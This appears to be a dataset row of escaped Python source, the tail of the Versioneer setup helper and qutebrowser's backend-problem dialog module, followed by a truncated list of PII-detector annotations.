cmd_version(Command):\n description = ""report generated version string""\n user_options = []\n boolean_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n vers = get_versions(verbose=True)\n print(""Version: %s"" % vers[""version""])\n print("" full-revisionid: %s"" % vers.get(""full-revisionid""))\n print("" dirty: %s"" % vers.get(""dirty""))\n if vers[""error""]:\n print("" error: %s"" % vers[""error""])\n cmds[""version""] = cmd_version\n\n # we override ""build_py"" in both distutils and setuptools\n #\n # most invocation pathways end up running build_py:\n # distutils/build -> build_py\n # distutils/install -> distutils/build ->..\n # setuptools/bdist_wheel -> distutils/install ->..\n # setuptools/bdist_egg -> distutils/install_lib -> build_py\n # setuptools/install -> bdist_egg ->..\n # setuptools/develop -> ?\n\n # we override different ""build_py"" commands for both environments\n if ""setuptools"" in sys.modules:\n from setuptools.command.build_py import build_py as _build_py\n else:\n from distutils.command.build_py import build_py as _build_py\n\n class cmd_build_py(_build_py):\n def run(self):\n root = get_root()\n cfg = get_config_from_root(root)\n versions = get_versions()\n _build_py.run(self)\n # now locate _version.py in the new build/ directory and replace\n # it with an updated value\n if cfg.versionfile_build:\n target_versionfile = os.path.join(self.build_lib,\n cfg.versionfile_build)\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile, versions)\n cmds[""build_py""] = cmd_build_py\n\n if ""cx_Freeze"" in sys.modules: # cx_freeze enabled?\n from cx_Freeze.dist import build_exe as _build_exe\n\n class cmd_build_exe(_build_exe):\n def run(self):\n root = get_root()\n cfg = get_config_from_root(root)\n versions = get_versions()\n target_versionfile = cfg.versionfile_source\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile, versions)\n\n _build_exe.run(self)\n os.unlink(target_versionfile)\n with open(cfg.versionfile_source, ""w"") as f:\n LONG = LONG_VERSION_PY[cfg.VCS]\n f.write(LONG %\n {""DOLLAR"": ""$"",\n ""STYLE"": cfg.style,\n ""TAG_PREFIX"": cfg.tag_prefix,\n ""PARENTDIR_PREFIX"": cfg.parentdir_prefix,\n ""VERSIONFILE_SOURCE"": cfg.versionfile_source,\n })\n cmds[""build_exe""] = cmd_build_exe\n del cmds[""build_py""]\n\n # we override different ""sdist"" commands for both environments\n if ""setuptools"" in sys.modules:\n from setuptools.command.sdist import sdist as _sdist\n else:\n from distutils.command.sdist import sdist as _sdist\n\n class cmd_sdist(_sdist):\n def run(self):\n versions = get_versions()\n self._versioneer_generated_versions = versions\n # unless we update this, the command will keep using the old\n # version\n self.distribution.metadata.version = versions[""version""]\n return _sdist.run(self)\n\n def make_release_tree(self, base_dir, files):\n root = get_root()\n cfg = get_config_from_root(root)\n _sdist.make_release_tree(self, base_dir, files)\n # now locate _version.py in the new base_dir directory\n # (remembering that it may be a hardlink) and replace it with an\n # updated value\n target_versionfile = os.path.join(base_dir, cfg.versionfile_source)\n print(""UPDATING %s"" % target_versionfile)\n write_to_version_file(target_versionfile,\n self._versioneer_generated_versions)\n cmds[""sdist""] = cmd_sdist\n\n return cmds\n\n\nCONFIG_ERROR = """"""\nsetup.cfg is missing the necessary Versioneer configuration. You need\na section like:\n\n [versioneer]\n VCS = git\n style = pep440\n versionfile_source = src/myproject/_version.py\n versionfile_build = myproject/_version.py\n tag_prefix =\n parentdir_prefix = myproject-\n\nYou will also need to edit your setup.py to use the results:\n\n import versioneer\n setup(version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(), ...)\n\nPlease read the docstring in ./versioneer.py for configuration instructions,\nedit setup.cfg, and re-run the installer or \'python versioneer.py setup\'.\n""""""\n\nSAMPLE_CONFIG = """"""\n# See the docstring in versioneer.py for instructions. Note that you must\n# re-run \'versioneer.py setup\' after changing this section, and commit the\n# resulting files.\n\n[versioneer]\n#VCS = git\n#style = pep440\n#versionfile_source =\n#versionfile_build =\n#tag_prefix =\n#parentdir_prefix =\n\n""""""\n\nINIT_PY_SNIPPET = """"""\nfrom ._version import get_versions\n__version__ = get_versions()[\'version\']\ndel get_versions\n""""""\n\n\ndef do_setup():\n """"""Main VCS-independent setup function for installing Versioneer.""""""\n root = get_root()\n try:\n cfg = get_config_from_root(root)\n except (EnvironmentError, configparser.NoSectionError,\n configparser.NoOptionError) as e:\n if isinstance(e, (EnvironmentError, configparser.NoSectionError)):\n print(""Adding sample versioneer config to setup.cfg"",\n file=sys.stderr)\n with open(os.path.join(root, ""setup.cfg""), ""a"") as f:\n f.write(SAMPLE_CONFIG)\n print(CONFIG_ERROR, file=sys.stderr)\n return 1\n\n print("" creating %s"" % cfg.versionfile_source)\n with open(cfg.versionfile_source, ""w"") as f:\n LONG = LONG_VERSION_PY[cfg.VCS]\n f.write(LONG % {""DOLLAR"": ""$"",\n ""STYLE"": cfg.style,\n ""TAG_PREFIX"": cfg.tag_prefix,\n ""PARENTDIR_PREFIX"": cfg.parentdir_prefix,\n ""VERSIONFILE_SOURCE"": cfg.versionfile_source,\n })\n\n ipy = os.path.join(os.path.dirname(cfg.versionfile_source),\n ""__init__.py"")\n if os.path.exists(ipy):\n try:\n with open(ipy, ""r"") as f:\n old = f.read()\n except EnvironmentError:\n old = """"\n if INIT_PY_SNIPPET not in old:\n print("" appending to %s"" % ipy)\n with open(ipy, ""a"") as f:\n f.write(INIT_PY_SNIPPET)\n else:\n print("" %s unmodified"" % ipy)\n else:\n print("" %s doesn\'t exist, ok"" % ipy)\n ipy = None\n\n # Make sure both the top-level ""versioneer.py"" and versionfile_source\n # (PKG/_version.py, used by runtime code) are in MANIFEST.in, so\n # they\'ll be copied into source distributions. Pip won\'t be able to\n # install the package without this.\n manifest_in = os.path.join(root, ""MANIFEST.in"")\n simple_includes = set()\n try:\n with open(manifest_in, ""r"") as f:\n for line in f:\n if line.startswith(""include ""):\n for include in line.split()[1:]:\n simple_includes.add(include)\n except EnvironmentError:\n pass\n # That doesn\'t cover everything MANIFEST.in can do\n # (http://docs.python.org/2/distutils/sourcedist.html#commands), so\n # it might give some false negatives. Appending redundant \'include\'\n # lines is safe, though.\n if ""versioneer.py"" not in simple_includes:\n print("" appending \'versioneer.py\' to MANIFEST.in"")\n with open(manifest_in, ""a"") as f:\n f.write(""include versioneer.py\\n"")\n else:\n print("" \'versioneer.py\' already in MANIFEST.in"")\n if cfg.versionfile_source not in simple_includes:\n print("" appending versionfile_source (\'%s\') to MANIFEST.in"" %\n cfg.versionfile_source)\n with open(manifest_in, ""a"") as f:\n f.write(""include %s\\n"" % cfg.versionfile_source)\n else:\n print("" versionfile_source already in MANIFEST.in"")\n\n # Make VCS-specific changes. For git, this means creating/changing\n # .gitattributes to mark _version.py for export-time keyword\n # substitution.\n do_vcs_install(manifest_in, cfg.versionfile_source, ipy)\n return 0\n\n\ndef scan_setup_py():\n """"""Validate the contents of setup.py against Versioneer\'s expectations.""""""\n found = set()\n setters = False\n errors = 0\n with open(""setup.py"", ""r"") as f:\n for line in f.readlines():\n if ""import versioneer"" in line:\n found.add(""import"")\n if ""versioneer.get_cmdclass()"" in line:\n found.add(""cmdclass"")\n if ""versioneer.get_version()"" in line:\n found.add(""get_version"")\n if ""versioneer.VCS"" in line:\n setters = True\n if ""versioneer.versionfile_source"" in line:\n setters = True\n if len(found) != 3:\n print("""")\n print(""Your setup.py appears to be missing some important items"")\n print(""(but I might be wrong). Please make sure it has something"")\n print(""roughly like the following:"")\n print("""")\n print("" import versioneer"")\n print("" setup( version=versioneer.get_version(),"")\n print("" cmdclass=versioneer.get_cmdclass(), ...)"")\n print("""")\n errors += 1\n if setters:\n print(""You should remove lines like \'versioneer.VCS = \' and"")\n print(""\'versioneer.versionfile_source = \' . This configuration"")\n print(""now lives in setup.cfg, and should be removed from setup.py"")\n print("""")\n errors += 1\n return errors\n\nif __name__ == ""__main__"":\n cmd = sys.argv[1]\n if cmd == ""setup"":\n errors = do_setup()\n errors += scan_setup_py()\n if errors:\n sys.exit(1)\n', '# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com\n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. If not, see .\n\n""""""Dialogs shown when there was a problem with a backend choice.""""""\n\nimport os\nimport sys\nimport functools\nimport html\nimport enum\nimport shutil\nimport argparse\nimport dataclasses\nfrom typing import Any, List, Sequence, Tuple, Optional\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel,\n QMessageBox, QWidget)\nfrom PyQt5.QtNetwork import QSslSocket\n\nfrom qutebrowser.config import config, configfiles\nfrom qutebrowser.utils import (usertypes, version, qtutils, log, utils,\n standarddir)\nfrom qutebrowser.misc import objects, msgbox, savemanager, quitter\n\n\nclass _Result(enum.IntEnum):\n\n """"""The result code returned by the backend problem dialog.""""""\n\n quit = QDialog.Accepted + 1\n restart = QDialog.Accepted + 2\n restart_webkit = QDialog.Accepted + 3\n restart_webengine = QDialog.Accepted + 4\n\n\n@dataclasses.dataclass\nclass _Button:\n\n """"""A button passed to BackendProblemDialog.""""""\n\n text: str\n setting: str\n value: Any\n default: bool = False\n\n\ndef _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]:\n """"""Get the other backend enum/setting for a given backend.""""""\n other_backend = {\n usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine,\n usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit,\n }[backend]\n other_setting = other_backend.name.lower()[2:]\n return (other_backend, other_setting)\n\n\ndef _error_text(because: str, text: str, backend: usertypes.Backend) -> str:\n """"""Get an error text for the given information.""""""\n other_backend, other_setting = _other_backend(backend)\n if other_backend == usertypes.Backend.QtWebKit:\n warning = (""Note that QtWebKit hasn\'t been updated since ""\n ""July 2017 (including security updates)."")\n suffix = "" (not recommended)""\n else:\n warning = """"\n suffix = """"\n return (""Failed to start with the {backend} backend!""\n ""

    qutebrowser tried to start with the {backend} backend but ""\n ""failed because {because}.

    {text}""\n ""

    Forcing the {other_backend.name} backend{suffix}

    ""\n ""

    This forces usage of the {other_backend.name} backend by ""\n ""setting the backend = \'{other_setting}\' option ""\n ""(if you have a config.py file, you\'ll need to set ""\n ""this manually). {warning}

    "".format(\n backend=backend.name, because=because, text=text,\n other_backend=other_backend, other_setting=other_setting,\n warning=warning, suffix=suffix))\n\n\nclass _Dialog(QDialog):\n\n """"""A dialog which gets shown if there are issues with the backend.""""""\n\n def __init__(self, *, because: str,\n text: str,\n backend: usertypes.Backend,\n buttons: Sequence[_Button] = None,\n parent: QWidget = None) -> None:\n super().__init__(parent)\n vbox = QVBoxLayout(self)\n\n other_backend, other_setting = _other_backend(backend)\n text = _error_text(because, text, backend)\n\n label = QLabel(text)\n label.setWordWrap(True)\n label.setTextFormat(Qt.RichText)\n vbox.addWidget(label)\n\n hbox = QHBoxLayout()\n buttons = [] if buttons is None else buttons\n\n quit_button = QPushButton(""Quit"")\n quit_button.clicked.connect(lambda: self.done(_Result.quit))\n hbox.addWidget(quit_button)\n\n backend_text = ""Force {} backend"".format(other_backend.name)\n if other_backend == usertypes.Backend.QtWebKit:\n backend_text += \' (not recommended)\'\n backend_button = QPushButton(backend_text)\n backend_button.clicked.connect(functools.partial(\n self._change_setting, \'backend\', other_setting))\n hbox.addWidget(backend_button)\n\n for button in buttons:\n btn = QPushButton(button.text)\n btn.setDefault(button.default)\n btn.clicked.connect(functools.partial(\n self._change_setting, button.setting, button.value))\n hbox.addWidget(btn)\n\n vbox.addLayout(hbox)\n\n def _change_setting(self, setting: str, value: str) -> None:\n """"""Change the given setting and restart.""""""\n config.instance.set_obj(setting, value, save_yaml=True)\n\n if setting == \'backend\' and value == \'webkit\':\n self.done(_Result.restart_webkit)\n elif setting == \'backend\' and value == \'webengine\':\n self.done(_Result.restart_webengine)\n else:\n self.done(_Result.restart)\n\n\n@dataclasses.dataclass\nclass _BackendImports:\n\n """"""Whether backend modules could be imported.""""""\n\n webkit_error: Optional[str] = None\n webengine_error: Optional[str] = None\n\n\nclass _BackendProblemChecker:\n\n """"""Check for various backend-specific issues.""""""\n\n def __init__(self, *,\n no_err_windows: bool,\n save_manager: savemanager.SaveManager) -> None:\n self._save_manager = save_manager\n self._no_err_windows = no_err_windows\n\n def _show_dialog(self, *args: Any, **kwargs: Any) -> None:\n """"""Show a dialog for a backend problem.""""""\n if self._no_err_windows:\n text = _error_text(*args, **kwargs)\n print(text, file=sys.stderr)\n sys.exit(usertypes.Exit.err_init)\n\n dialog = _Dialog(*args, **kwargs)\n\n status = dialog.exec()\n self._save_manager.save_all(is_exit=True)\n\n if status in [_Result.quit, QDialog.Rejected]:\n pass\n elif status == _Result.restart_webkit:\n quitter.instance.restart(override_args={\'backend\': \'webkit\'})\n elif status == _Result.restart_webengine:\n quitter.instance.restart(override_args={\'backend\': \'webengine\'})\n elif status == _Result.restart:\n quitter.instance.restart()\n else:\n raise utils.Unreachable(status)\n\n sys.exit(usertypes.Exit.err_init)\n\n def _nvidia_shader_workaround(self) -> None:\n """"""Work around QOpenGLShaderProgram issues.\n\n See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826\n """"""\n self._assert_backend(usertypes.Backend.QtWebEngine)\n utils.libgl_workaround()\n\n def _xwayland_options(self) -> Tuple[str, List[_Button]]:\n """"""Get buttons/text for a possible XWayland solution.""""""\n buttons = []\n text = ""

    You can work around this in one of the following ways:

    ""\n\n if \'DISPLAY\' in os.environ:\n # XWayland is available, but QT_QPA_PLATFORM=wayland is set\n buttons.append(\n _Button(""Force XWayland"", \'qt.force_platform\', \'xcb\'))\n text += (""

    Force Qt to use XWayland

    ""\n ""

    This allows you to use the newer QtWebEngine backend ""\n ""(based on Chromium). ""\n ""This sets the qt.force_platform = \'xcb\' option ""\n ""(if you have a config.py file, you\'ll need to ""\n ""set this manually).

    "")\n else:\n text += (""

    Set up XWayland

    ""\n ""

    This allows you to use the newer QtWebEngine backend ""\n ""(based on Chromium). "")\n\n return text, buttons\n\n def _handle_wayland_webgl(self) -> None:\n """"""On older graphic hardware, WebGL on Wayland causes segfaults.\n\n See https://github.com/qutebrowser/qutebrowser/issues/5313\n """"""\n self._assert_backend(usertypes.Backend.QtWebEngine)\n\n if os.environ.get(\'QUTE_SKIP_WAYLAND_WEBGL_CHECK\'):\n return\n\n platform = objects.qapp.platformName()\n if platform not in [\'wayland\', \'wayland-egl\']:\n return\n\n # Only Qt 5.14 should be affected\n if not qtutils.version_check(\'5.14\', compiled=False):\n return\n if qtutils.version_check(\'5.15\', compiled=False):\n return\n\n # Newer graphic hardware isn\'t affected\n opengl_info = version.opengl_info()\n if (opengl_info is None or\n opengl_info.gles or\n opengl_info.version is None or\n opengl_info.version >= (4, 3)):\n return\n\n # If WebGL is turned off, we\'re fine\n if not config.val.content.webgl:\n return\n\n text, buttons = self._xwayland_options()\n\n buttons.append(_Button(""Turn off WebGL (recommended)"",\n \'content.webgl\',\n False))\n text += (""

    Disable WebGL (recommended)

    ""\n ""This sets the content.webgl = False option ""\n ""(if you have a config.py file, you\'ll need to ""\n ""set this manually).

    "")\n\n self._show_dialog(backend=usertypes.Backend.QtWebEngine,\n because=(""of frequent crashes with Qt 5.14 on ""\n ""Wayland with older graphics hardware""),\n text=text,\n buttons=buttons)\n\n def _try_import_backends(self) -> _BackendImports:\n """"""Check whether backends can be imported and return BackendImports.""""""\n # pylint: disable=unused-import\n results = _BackendImports()\n\n try:\n from PyQt5 import QtWebKit\n from PyQt5.QtWebKit import qWebKitVersion\n from PyQt5 import QtWebKitWidgets\n except (ImportError, ValueError) as e:\n results.webkit_error = str(e)\n else:\n if not qtutils.is_new_qtwebkit():\n results.webkit_error = ""Unsupported legacy QtWebKit found""\n\n try:\n from PyQt5 import QtWebEngineWidgets\n except (ImportError, ValueError) as e:\n results.webengine_error = str(e)\n\n return results\n\n def _handle_ssl_support(self, fatal: bool = False) -> None:\n """"""Check for full SSL availability.\n\n If ""fatal"" is given, show an error and exit.\n """"""\n if QSslSocket.supportsSsl():\n return\n\n if qtutils.version_check(\'5.12.4\'):\n version_text = (""If you use OpenSSL 1.0 with a PyQt package from ""\n ""PyPI (e.g. on Ubuntu 16.04), you will need to ""\n ""build OpenSSL 1.1 from sources and set ""\n ""LD_LIBRARY_PATH accordingly."")\n else:\n version_text = (""If you use OpenSSL 1.1 with a PyQt package from ""\n ""PyPI (e.g. on Archlinux or Debian Stretch), you ""\n ""need to set LD_LIBRARY_PATH to the path of ""\n ""OpenSSL 1.0 or use Qt >= 5.12.4."")\n\n text = (""Could not initialize QtNetwork SSL support. {} This only ""\n ""affects downloads and :adblock-update."".format(version_text))\n\n if fatal:\n errbox = msgbox.msgbox(parent=None,\n title=""SSL error"",\n text=""Could not initialize SSL support."",\n icon=QMessageBox.Critical,\n plain_text=False)\n errbox.exec()\n sys.exit(usertypes.Exit.err_init)\n\n assert not fatal\n log.init.warning(text)\n\n def _check_backend_modules(self) -> None:\n """"""Check for the modules needed for QtWebKit/QtWebEngine.""""""\n imports = self._try_import_backends()\n\n if not imports.webkit_error and not imports.webengine_error:\n return\n elif imports.webkit_error and imports.webengine_error:\n text = (""

    qutebrowser needs QtWebKit or QtWebEngine, but ""\n ""neither could be imported!

    ""\n ""

    The errors encountered were:

      ""\n ""
    • QtWebKit: {webkit_error}""\n ""
    • QtWebEngine: {webengine_error}""\n ""

    "".format(\n webkit_error=html.escape(imports.webkit_error),\n webengine_error=html.escape(imports.webengine_error)))\n errbox = msgbox.msgbox(parent=None,\n title=""No backend library found!"",\n text=text,\n icon=QMessageBox.Critical,\n plain_text=False)\n errbox.exec()\n sys.exit(usertypes.Exit.err_init)\n elif objects.backend == usertypes.Backend.QtWebKit:\n if not imports.webkit_error:\n return\n self._show_dialog(\n backend=usertypes.Backend.QtWebKit,\n because=""QtWebKit could not be imported"",\n text=""

    The error encountered was:
    {}

    "".format(\n html.escape(imports.webkit_error))\n )\n elif objects.backend == usertypes.Backend.QtWebEngine:\n if not imports.webengine_error:\n return\n self._show_dialog(\n backend=usertypes.Backend.QtWebEngine,\n because=""QtWebEngine could not be imported"",\n text=""

    The error encountered was:
    {}

    "".format(\n html.escape(imports.webengine_error))\n )\n\n raise utils.Unreachable\n\n def _handle_cache_nuking(self) -> None:\n """"""Nuke the QtWebEngine cache if the Qt version changed.\n\n WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532\n """"""\n if not configfiles.state.qt_version_changed:\n return\n\n # Only nuke the cache in cases where we know there are problems.\n # It seems these issues started with Qt 5.12.\n # They should be fixed with Qt 5.12.5:\n # https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408\n if qtutils.version_check(\'5.12.5\', compiled=False):\n return\n\n log.init.info(""Qt version changed, nuking QtWebEngine cache"")\n cache_dir = os.path.join(standarddir.cache(), \'webengine\')\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n\n def _handle_serviceworker_nuking(self) -> None:\n """"""Nuke the service workers directory if the Qt version changed.\n\n WORKAROUND for:\n https://bugreports.qt.io/browse/QTBUG-72532\n https://bugreports.qt.io/browse/QTBUG-82105\n """"""\n if (\'serviceworker_workaround\' not in configfiles.state[\'general\'] and\n qtutils.version_check(\'5.14\', compiled=False)):\n # Nuke the service worker directory once for every install with Qt\n # 5.14, given that it seems to cause a variety of segfaults.\n configfiles.state[\'general\'][\'serviceworker_workaround\'] = \'514\'\n affected = True\n else:\n # Otherwise, just nuke it when the Qt version changed.\n affected = configfiles.state.qt_version_changed\n\n if not affected:\n return\n\n service_worker_dir = os.path.join(standarddir.data(), \'webengine\',\n \'Service Worker\')\n bak_dir = service_worker_dir + \'-bak\'\n if not os.path.exists(service_worker_dir):\n return\n\n log.init.info(""Qt version changed, removing service workers"")\n\n # Keep one backup around - we\'re not 100% sure what persistent data\n # could be in there, but this folder can grow to ~300 MB.\n if os.path.exists(bak_dir):\n shutil.rmtree(bak_dir)\n\n shutil.move(service_worker_dir, bak_dir)\n\n def _assert_backend(self, backend: usertypes.Backend) -> None:\n assert objects.backend == backend, objects.backend\n\n def check(self) -> None:\n """"""Run all checks.""""""\n self._check_backend_modules()\n if objects.backend == usertypes.Backend.QtWebEngine:\n self._handle_ssl_support()\n self._nvidia_shader_workaround()\n self._handle_wayland_webgl()\n self._handle_cache_nuking()\n self._handle_serviceworker_nuking()\n else:\n self._assert_backend(usertypes.Backend.QtWebKit)\n self._handle_ssl_support(fatal=True)\n\n\ndef init(*, args: argparse.Namespace,\n save_manager: savemanager.SaveManager) -> None:\n """"""Run all checks.""""""\n checker = _BackendProblemChecker(no_err_windows=args.no_err_windows,\n save_manager=save_manager)\n checker.check()\n']",110,"[type: DATE_TIME, start: 5, end: 15, score: 0.85, type: DATE_TIME, start: 110, end: 120, score: 0.85, type: PERSON, start: 302, end: 346, score: 0.85, type: PERSON, start: 487, end: 494, score: 0.85, type: PERSON, start: 1048, end: 1054, score: 0.85, type: URL, start: 70, end: 85, score: 0.6, type: URL, start: 315, end: 358, score: 0.6, type: LOCATION, start: 174, end: 183, score: 0.85, type: LOCATION, start: 270, end: 274, score: 0.85, type: LOCATION, start: 410, end: 420, score: 0.85, type: PERSON, start: 619, end: 628, score: 0.85, type: PERSON, start: 1008, end: 1017, score: 0.85, type: IP_ADDRESS, start: 219, end: 228, score: 0.6, type: URL, start: 9, end: 20, score: 0.5, type: URL, start: 66, end: 79, score: 0.5, type: URL, start: 96, end: 109, score: 0.5, type: URL, start: 320, end: 326, score: 0.5, type: URL, start: 342, end: 348, score: 0.5, type: URL, start: 360, end: 366, score: 0.5, type: URL, start: 454, end: 467, score: 0.5, type: URL, start: 500, end: 506, score: 0.5, type: URL, start: 670, end: 683, score: 0.5, type: URL, start: 762, end: 769, score: 0.5, type: URL, start: 883, end: 896, score: 0.5, type: URL, start: 1038, end: 1051, score: 0.5, type: URL, start: 1157, end: 1162, score: 0.5, type: URL, start: 1294, end: 1311, score: 0.5, type: URL, start: 1333, end: 1339, score: 0.5, type: URL, start: 1399, end: 1412, score: 0.5, type: PERSON, start: 120, end: 125, score: 0.85, type: DATE_TIME, start: 747, end: 771, score: 0.85, type: DATE_TIME, start: 842, end: 866, score: 0.85, type: PERSON, start: 1965, end: 1968, score: 0.85, type: IP_ADDRESS, start: 313, end: 316, score: 0.6, type: URL, start: 108, end: 119, score: 0.5, type: URL, start: 1341, end: 1346, score: 0.5, type: URL, start: 1357, end: 1367, score: 0.5, type: URL, start: 1400, end: 1410, score: 0.5, type: URL, start: 1630, end: 1636, score: 0.5, type: URL, start: 1749, end: 1755, score: 0.5, type: URL, start: 2004, end: 2017, score: 0.5, type: URL, start: 2110, end: 2116, score: 0.5, type: URL, start: 2420, end: 2431, score: 0.5, type: URL, start: 2479, end: 2490, score: 0.5, type: EMAIL_ADDRESS, start: 62, end: 77, score: 1.0, type: DATE_TIME, start: 41, end: 45, score: 0.85, type: PERSON, start: 46, end: 61, score: 0.85, type: PERSON, start: 4030, end: 4052, score: 0.85, type: PERSON, start: 6134, end: 6148, score: 0.85, type: PERSON, start: 6438, end: 6452, score: 0.85, type: PERSON, start: 8139, end: 8144, score: 0.85, type: PERSON, start: 8432, end: 8447, score: 0.85, type: URL, start: 9829, end: 9839, score: 0.85, type: URL, start: 9867, end: 9877, score: 0.85, type: NRP, start: 14363, end: 14372, score: 0.85, type: LOCATION, start: 14478, end: 14485, score: 0.85, type: LOCATION, start: 14611, end: 14639, score: 0.85, type: URL, start: 703, end: 731, score: 0.6, type: URL, start: 6154, end: 6188, score: 0.6, type: URL, start: 8148, end: 8190, score: 0.6, type: URL, start: 8449, end: 8469, score: 0.6, type: URL, start: 11433, end: 11453, score: 0.6, type: URL, start: 68, end: 77, score: 0.5, type: URL, start: 1112, end: 1129, score: 0.5, type: URL, start: 1545, end: 1557, score: 0.5, type: URL, start: 1903, end: 1910, score: 0.5, type: URL, start: 2014, end: 2023, score: 0.5, type: URL, start: 2291, end: 2296, score: 0.5, type: URL, start: 2420, end: 2433, score: 0.5, type: URL, start: 2483, end: 2488, score: 0.5, type: URL, start: 2520, end: 2533, score: 0.5, type: URL, start: 2583, end: 2593, score: 0.5, type: URL, start: 2732, end: 2742, score: 0.5, type: URL, start: 2785, end: 2798, score: 0.5, type: URL, start: 2862, end: 2867, score: 0.5, type: URL, start: 3065, end: 3076, score: 0.5, type: URL, start: 3176, end: 3187, score: 0.5, type: URL, start: 4361, end: 4374, score: 0.5, type: URL, start: 4428, end: 4441, score: 0.5, type: URL, start: 4475, end: 4488, score: 0.5, type: URL, start: 4515, end: 4520, score: 0.5, type: URL, start: 5255, end: 5262, score: 0.5, type: URL, start: 5788, end: 5794, score: 0.5, type: URL, start: 6703, end: 6715, score: 0.5, type: URL, start: 6817, end: 6824, score: 0.5, type: URL, start: 6932, end: 6939, score: 0.5, type: URL, start: 7105, end: 7112, score: 0.5, type: URL, start: 8353, end: 8363, score: 0.5, type: URL, start: 8552, end: 8559, score: 0.5, type: URL, start: 8579, end: 8586, score: 0.5, type: URL, start: 8607, end: 8614, score: 0.5, type: URL, start: 8639, end: 8646, score: 0.5, type: URL, start: 8669, end: 8677, score: 0.5, type: URL, start: 8695, end: 8703, score: 0.5, type: URL, start: 8738, end: 8746, score: 0.5, type: URL, start: 9047, end: 9054, score: 0.5, type: URL, start: 9183, end: 9190, score: 0.5, type: URL, start: 9222, end: 9229, score: 0.5, type: URL, start: 9251, end: 9258, score: 0.5, type: URL, start: 9312, end: 9319, score: 0.5, type: URL, start: 9330, end: 9337, score: 0.5, type: URL, start: 9407, end: 9415, score: 0.5, type: URL, start: 9436, end: 9443, score: 0.5, type: URL, start: 9752, end: 9767, score: 0.5, type: URL, start: 10065, end: 10072, score: 0.5, type: URL, start: 11175, end: 11182, score: 0.5, type: URL, start: 11418, end: 11429, score: 0.5, type: URL, start: 11526, end: 11542, score: 0.5, type: URL, start: 12023, end: 12051, score: 0.5, type: URL, start: 12438, end: 12445, score: 0.5, type: URL, start: 12714, end: 12721, score: 0.5, type: URL, start: 12763, end: 12771, score: 0.5, type: URL, start: 13606, end: 13614, score: 0.5, type: URL, start: 14045, end: 14055, score: 0.5, type: URL, start: 14301, end: 14307, score: 0.5, type: URL, start: 14495, end: 14501, score: 0.5, type: URL, start: 14619, end: 14625, score: 0.5, type: URL, start: 14722, end: 14741, score: 0.5, type: EMAIL_ADDRESS, start: 7886, end: 7901, score: 1.0, type: EMAIL_ADDRESS, start: 7925, end: 7940, score: 1.0, type: EMAIL_ADDRESS, start: 7966, end: 7981, score: 1.0, type: URL, start: 15787, end: 15844, score: 0.95, type: DATE_TIME, start: 30, end: 34, score: 0.85, type: PERSON, start: 1008, end: 1019, score: 0.85, type: PERSON, start: 3042, end: 3091, score: 0.85, type: PERSON, start: 5667, end: 5704, score: 0.85, type: PERSON, start: 6350, end: 6366, score: 0.85, type: PERSON, start: 6557, end: 6568, score: 0.85, type: PERSON, start: 7003, end: 7007, score: 0.85, type: PERSON, start: 7800, end: 7809, score: 0.85, type: PERSON, start: 8423, end: 8439, score: 0.85, type: PERSON, start: 8844, end: 8892, score: 0.85, type: DATE_TIME, start: 9386, end: 9393, score: 0.85, type: PERSON, start: 9681, end: 9718, score: 0.85, type: PERSON, start: 9748, end: 9794, score: 0.85, type: PERSON, start: 10504, end: 10527, score: 0.85, type: PERSON, start: 11480, end: 11508, score: 0.85, type: DATE_TIME, start: 11845, end: 11847, score: 0.85, type: DATE_TIME, start: 11849, end: 11851, score: 0.85, type: DATE_TIME, start: 11856, end: 11858, score: 0.85, type: LOCATION, start: 12025, end: 12039, score: 0.85, type: DATE_TIME, start: 12753, end: 12771, score: 0.85, type: URL, start: 13048, end: 13058, score: 0.85, type: LOCATION, start: 13447, end: 13477, score: 0.85, type: PERSON, start: 13643, end: 13662, score: 0.85, type: PERSON, start: 13819, end: 13827, score: 0.85, type: PERSON, start: 17078, end: 17095, score: 0.85, type: NRP, start: 17209, end: 17240, score: 0.85, type: PERSON, start: 18628, end: 18649, score: 0.85, type: PERSON, start: 18825, end: 18844, score: 0.85, type: LOCATION, start: 19005, end: 19021, score: 0.85, type: PERSON, start: 19269, end: 19303, score: 0.85, type: PERSON, start: 19390, end: 19426, score: 0.85, type: PERSON, start: 19633, end: 19667, score: 0.85, type: PERSON, start: 21128, end: 21154, score: 0.85, type: DATE_TIME, start: 21301, end: 21309, score: 0.85, type: PERSON, start: 21403, end: 21412, score: 0.85, type: DATE_TIME, start: 22138, end: 22145, score: 0.85, type: DATE_TIME, start: 22484, end: 22491, score: 0.85, type: PERSON, start: 25141, end: 25152, score: 0.85, type: NRP, start: 25154, end: 25163, score: 0.85, type: NRP, start: 25270, end: 25277, score: 0.85, type: NRP, start: 25331, end: 25339, score: 0.85, type: NRP, start: 25392, end: 25397, score: 0.85, type: NRP, start: 25448, end: 25454, score: 0.85, type: NRP, start: 25510, end: 25515, score: 0.85, type: PERSON, start: 25557, end: 25567, score: 0.85, type: NRP, start: 25628, end: 25635, score: 0.85, type: NRP, start: 25689, end: 25695, score: 0.85, type: NRP, start: 25748, end: 25754, score: 0.85, type: NRP, start: 25808, end: 25813, score: 0.85, type: PERSON, start: 25969, end: 25977, score: 0.85, type: NRP, start: 25979, end: 25988, score: 0.85, type: LOCATION, start: 26039, end: 26048, score: 0.85, type: NRP, start: 26050, 